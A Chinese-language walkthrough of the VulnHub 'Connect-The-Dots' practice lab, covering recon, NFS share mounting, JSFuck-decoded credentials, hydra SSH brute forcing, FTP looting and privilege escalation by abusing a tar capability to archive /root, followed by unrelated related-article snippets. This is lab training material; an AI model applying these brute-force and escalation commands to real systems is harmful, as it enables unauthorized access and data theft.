Connect-The-Dots靶场
靶场下载
https://www.vulnhub.com/entry/connect-the-dots-1,384/
一、信息收集
探测存活主机
netdiscover -r 192.168.16.161/24nmap -sP 192.168.16.161/24
端口操作系统扫描
nmap -sV -sC -A -p 1-65535 192.168.16.159
扫描发现开放端口有
21 ftp
80 http
2049 nfs
7822 ssh
目录扫描
gobuster dir -u http://192.168.16.161 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
二、nfs文件共享漏洞检测
尝试查看靶机利用NFS共享的全部文件夹:
使用命令
showmount -e 192.168.16.161
可以看到/home/morris共享了
映射共享文件夹下的根目录。
在攻击机上面创建一个根文件夹/temp1/,其目的就是映射共享文件夹下的根目录。
mkdir /temp1
挂载文件
将靶机下的共享文件挂载到刚才新建的目录下
mount -t nfs 192.168.16.161:/home/morris /temp1
查看里面隐藏文件
ls -al
读取里面文件内容权限不够
三、目录分析
访问刚刚目录扫描结果,在http://192.168.16.161/mysite/
访问http://192.168.16.161/mysite/register.html发现登录页面
查看源代码,看到跳转到了几个文件",在刚刚路径中可以访问
jsfuck编码
访问http://192.168.16.161/mysite/bootstrap.min.cs,发现进行了加密
使用了jsfuck编码。
编码内容提取
文件从b1到b10一个个拿取乱
可以http://192.168.16.161/mysite/register.html,打开登录页面
点击控制台
输入命令:
console.log(b1+b2+b3+b4+b5+b6+b7+b8+b9+b10)
在线解密
http://codertab.com/JsUnFuck
得出密码应该是TryToGuessThisNorris@2k19
ssh暴力破解
hydra -L mi.txt -p TryToGuessThisNorris@2k19 ssh://192.168.16.161 -s 7822# -L : 指定字典
#-p 小写,指定密码破解
这里用户字典
破解结果:
sh] host: 192.168.16.161 login: norris password: TryToGuessThisNorris@2k19
四、FTP登录
ssh登录连接
ssh norris@192.168.16.161 -p 7822
查看当前目录下文件
在ftp下有四个文件
登录21端口FTP
ftp 192.168.16.161
输入刚刚破解得正确的账号和密码
使用get命令依次下载文件
get backups.bak
。。。
可以看到有两个图片一个txt文件
图片分析:工具exiftool
在geme.jpg中发现了波斯密码
exiftool game.jpg.bak
exiftool m.gif.bak
摩斯密码解密
在线解密网:https://gchq.github.io/CyberChef/
解密结果
取目标主机查找:SECRETFILE (秘密文件)
测试搜索直接关键字,这里用小写:secretfilefind / -name secretfile 2>/dev/null成功查找到,查看文件内容
查看这个目录下的隐藏文件:
查看里面内容,显示权限被拒绝
swp文件:是编辑器突然断电或 Ctrl+z 产生的文件
下载文件
wget http://192.168.16.160/.secretfile.swp
查看内容:strings .secretfile.swp
strings:用来提取和显示非文本文件中的文本字符串
查看存在用户
cat /etc/passwd | grep bash
尝试刚刚文件中的密码
最后登录成功
账号:morris 密码:blehguessme090
五、capabilities提权
参考:
Linux提权之:利用capabilities提权 - f_carey - 博客园 (cnblogs.com)
https://www.cnblogs.com/zlgxzswjy/p/14785228.html
Capabilities机制,是在Linux内核2.2之后引入的。它将root用户的权限细分为不同的领域,可以分别启用或禁用。从而,在实际进行特权操作时,如果euid不是root,便会检查是否具有该特权操作所对应的capabilities,并以此为依据,决定是否可以执行特权操作。
一、切换会no
二、查找设置过capabilities的应用程序
/usr/sbin/getcap -r / 2>/dev/null
三、 tar具备cap_dac_read_search=ep 可用执行root来读取文件。
四、打包root目录
tar -zcvf root.tar.gz /root # 打包/root目录
五、解压,查看文件得到flag
tar -zxvf root.tar.gz # 解压root.tar.gz
相关文章:
Connect-The-Dots靶场
靶场下载 https://www.vulnhub.com/entry/connect-the-dots-1,384/ 一、信息收集 探测存活主机 netdiscover -r 192.168.16.161/24nmap -sP 192.168.16.161/24端口操作系统扫描 nmap -sV -sC -A -p 1-65535 192.168.16.159扫描发现开放端口有 21 ftp 80 http 20…...
Linux解决RocketMQ中NameServer启动问题
启动步骤可以查看官网,https://github.com/apache/rocketmq 一下说明遇到的问题。 1:ROCKETMQ_HOME问题 根据官网提示进入mq/bin目录下,可以使用./mqnamesrv进行NameServer启动,但是会遇到第一个问题,首次下载Rocket…...
js逆向实战之某书protobuf反序列化
什么是Protobuf? \qquad Protobuf(Protocol Buffer)是 Google 开发的一套数据存储传输协议,作用就是将数据进行序列化后再传输,Protobuf 编码是二进制的,它不是可读的,也不容易手动修改…...
cpolar+JuiceSSH实现手机端远程连接Linux服务器
文章目录 1. Linux安装cpolar2. 创建公网SSH连接地址3. JuiceSSH公网远程连接4. 固定连接SSH公网地址5. SSH固定地址连接测试 处于内网的虚拟机如何被外网访问呢?如何手机就能访问虚拟机呢? cpolarJuiceSSH 实现手机端远程连接Linux虚拟机(内网穿透,手机端连接Linux虚拟机) …...
[MyBatis系列②]Dao层开发的两种方式
目录 1、传统开发 1.1、代码 1.2、存在的问题 2、代理开发 2.1、开发规范 2.2、代码 ⭐mybatis系列①:增删改查 1、传统开发 传统的mybatis开发中,是在数据访问层实现相应的接口,在实现类中用"命名空间.id"的形式找到对应的映…...
言语理解-中心理解之主题词及行文脉络
例题 例题 例题 例题 例题 例题...
LeetCode 面试题 01.05. 一次编辑
文章目录 一、题目二、C# 题解法一:从第一个不同位置处判断后续相同子串法二:前后序遍历判断第一个不同字符的位置关系 优化法一法二 一、题目 字符串有三种编辑操作:插入一个英文字符、删除一个英文字符或者替换一个英文字符。 给定两个字符串ÿ…...
Mybatis查询in的字段过多不走索引
mybatis查询in的字段有索引,比如说是主键查询, 但是in的字段过多导致索引失效, 这个时候可以考虑将in的数量变少, 200以内都可以, 在数据库方面采用 foreach unionall 的方式将数据集合查询出来 Service层: List<…...
封装公共el-form表单(记录)
1.公共表单组件 //commonForm.vue <script> import {TEXT,SELECT,PASSWORD,TEXTAREA,RADIO,DATE_PICKER } from /conf/uiTypes import { deepClone } from /utils export default {name: GFormCreator,props: {config: { // title/itemstype: Object,required: true}}…...
List 分批处理
1.Google Guava <dependency><groupId>com.google.guava</groupId><artifactId>guava</artifactId><version>31.0.1-jre</version></dependency>List<String> tempList Arrays.asList("水星","金星&qu…...
SpringSession
Spring Session 是 Spring 的项目之一。Spring Session 提供了一套创建和管理 Servlet HttpSession 的方案,默认采用外置的 Redis 来存储 Session 数据,以此来解决 Session 共享的 问题。(springsession储存session数据的方式有很多,我们常…...
Python Web 开发之 JWT 简介
在之前的课程中,介绍过 Flask-Login 框架,它是基于 Session 和 Cookie 技术来实现用户授权和验证的,不过 Session 有很多的局限性,这一节介绍一种基于 token 的验证方式 —— JWT (JSON Web Token),除了对 JWT 的概念讲解之外&…...
科技资讯|荷兰电动自行车丢失将被拒保,苹果Find My可以减少丢失
荷兰最大的自行车协会荷兰皇家旅游俱乐部宣布,将不再为胖胎电动自行车提供保险,因为这种自行车的被盗风险极高。 随着电动自行车的销量飙升,胖胎也变得更受欢迎。但问题是,胖胎电动自行车也成为了自行车盗窃者的首选目标。ANWB …...
debian rules语法
当创建Debian软件包时,debian/rules 文件是非常重要的,它定义了软件包的构建规则。这个文件使用Makefile语法,指导构建、编译和安装软件包。下面将详细地介绍debian/rules文件的语法和常见用法。 基本结构: 一个简单的debian/rul…...
网易2023年Q2财报:营收240亿元,游戏技术跨产业创造数字就业
8月24日,网易发布2023年Q2财报。二季度,网易继续聚焦主营业务,业绩表现稳健;净收入240亿元,非公认会计准则下归属于公司股东的持续经营净利润90亿元,研发投入39亿元,相当于拿出近一半利润投入研…...
Python的Flask框架创建、运行与访问
天行健,君子以自强不息;地势坤,君子以厚德载物。 每个人都有惰性,但不断学习是好好生活的根本,共勉! 文章均为学习整理笔记,分享记录为主,如有错误请指正,共同学习进步。…...
Java课题笔记~ 综合案例
3.综合案例 3.1 功能介绍 以上是我们在综合案例要实现的功能。除了对数据的增删改查功能外,还有一些复杂的功能,如 批量删除、分页查询、条件查询 等功能 批量删除 功能:每条数据前都有复选框,当我选中多条数据并点击 批量删除 按…...
Seaborn数据可视化(二)
目录 1.Seaborn风格设置 1.1 主题设置 1.2 轴线设置 1.3 移除轴线 1.4 使用字典传递函数 2.设置绘图元素比例 2.1 设置绘图元素比例paper 2.2 设置绘图元素比例poster 2.3 设置绘图元素比例notebook Seaborn将Matplotlib的参数划分为两个独立的组合,第一组用于…...
)
HDLBits-Verilog学习记录 | Verilog Language-Basics(1)
文章目录 3.Simple wire4.Four wires5.inverter | Notgate6. And gate7.Nor gate8.Xnorgate 3.Simple wire problem:Create a module with one input and one output that behaves like a wire. module top_module( input in, output out );assign out in;endmodule4.Four w…...
elementui表格嵌套上传文件直传到oss服务器(表单上传)
提示:记录项目中遇到的问题,仅供参考 文章目录 前言一、vue代码二、js接口请求代码 前言 项目需求是在表格中嵌套一个上传图片的功能,并且回显选择的图片和已上传的图片,再通过点击操作列中上传按钮才开始上传,使用的…...
)
告别轮询!用GD32F4xx的USART中断实现高效串口数据收发(实测对比耗时)
告别轮询!用GD32F4xx的USART中断实现高效串口数据收发(实测对比耗时) 在嵌入式系统中,串口通信是最基础也最常用的外设之一。对于需要同时处理多个任务的系统来说,如何高效地管理串口通信,减少CPU资源的占用…...
3步搞定Football Manager面部包管理:NewGAN-Manager完全指南
3步搞定Football Manager面部包管理:NewGAN-Manager完全指南 【免费下载链接】NewGAN-Manager A tool to generate and manage xml configs for the Newgen Facepack. 项目地址: https://gitcode.com/gh_mirrors/ne/NewGAN-Manager 你是否厌倦了在Football M…...
英雄联盟个人信息修改终极指南:3分钟学会LeaguePrank完整使用教程
英雄联盟个人信息修改终极指南:3分钟学会LeaguePrank完整使用教程 【免费下载链接】LeaguePrank 项目地址: https://gitcode.com/gh_mirrors/le/LeaguePrank 你是否厌倦了英雄联盟中千篇一律的个人资料显示?想向好友展示一个与众不同的游戏身份吗…...
CVBS转BT656/BT601,能成熟、应用广泛的低功耗视频解码器
GM7150是一款低功耗、9位NTSC/PAL视频解码器,由成都振芯科技股份有限公司生产。该芯片采用CMOS工艺,通过IC总线与PC或DSP相连构成应用系统。它内部包含1个模拟处理通道,能实现CVBS、S-Video视频信号源选择、A/D转换、自动钳位、自动增益控制(…...
深入理解LZFSE核心技术:Lempel-Ziv与FSE编码的完美结合
深入理解LZFSE核心技术:Lempel-Ziv与FSE编码的完美结合 【免费下载链接】lzfse LZFSE compression library and command line tool 项目地址: https://gitcode.com/gh_mirrors/lz/lzfse LZFSE(Lempel-Ziv Finite State Entropy)是苹果…...
5步掌握碧蓝航线Live2D资源提取完整教程
5步掌握碧蓝航线Live2D资源提取完整教程 【免费下载链接】AzurLaneLive2DExtract OBSOLETE - see readme / 碧蓝航线Live2D提取 项目地址: https://gitcode.com/gh_mirrors/az/AzurLaneLive2DExtract 你是否曾经被碧蓝航线中精美的Live2D角色动画所吸引,却苦…...
)
别再手动改‘等’和‘et al’了!Endnote X9搭配Word搞定GB/T7714格式中英文混排(保姆级教程)
科研写作效率革命:Endnote X9与Word协同实现中英文文献自动排版 看着期刊发回的格式修改意见,实验室的王博士又一次对着电脑屏幕叹了口气。参考文献列表里中英文混排的"等"和"et al"就像散落的拼图碎片,手动修改不仅耗时…...
)
别再为调试发愁!FreeRTOS下STM32串口打印的三种实用方案(含USART3重定向避坑)
FreeRTOS下STM32串口调试的三大实战方案与深度优化指南 在嵌入式开发中,调试信息的输出如同黑夜中的灯塔,为开发者指明程序运行的轨迹。当FreeRTOS遇上STM32,串口打印这个看似基础的功能却可能成为项目推进的绊脚石。本文将带您深入探索三种经…...
)
你的嵌入式数据记录仪方案:基于STM32CubeMX+FATFS+SD卡存储传感器数据(CSV格式实战)
嵌入式数据记录仪实战:STM32CubeMXFATFSSD卡构建工业级CSV存储方案 在工业物联网和智能硬件开发中,可靠的数据记录功能往往是产品核心价值所在。想象一下温室大棚的环境监控系统需要连续记录温湿度数据三个月,或者电力设备振动监测装置要在无…...
)
TVA智能体范式的工业视觉革命(4)
重磅预告:本专栏将独家连载系列丛书《智能体视觉技术与应用》部分精华内容,该书是世界首套系统阐述“因式智能体”视觉理论与实践的专著,特邀美国 TypeOne 公司首席科学家、斯坦福大学博士 Bohan 担任技术顾问。Bohan先生师从美国三院院士、“…...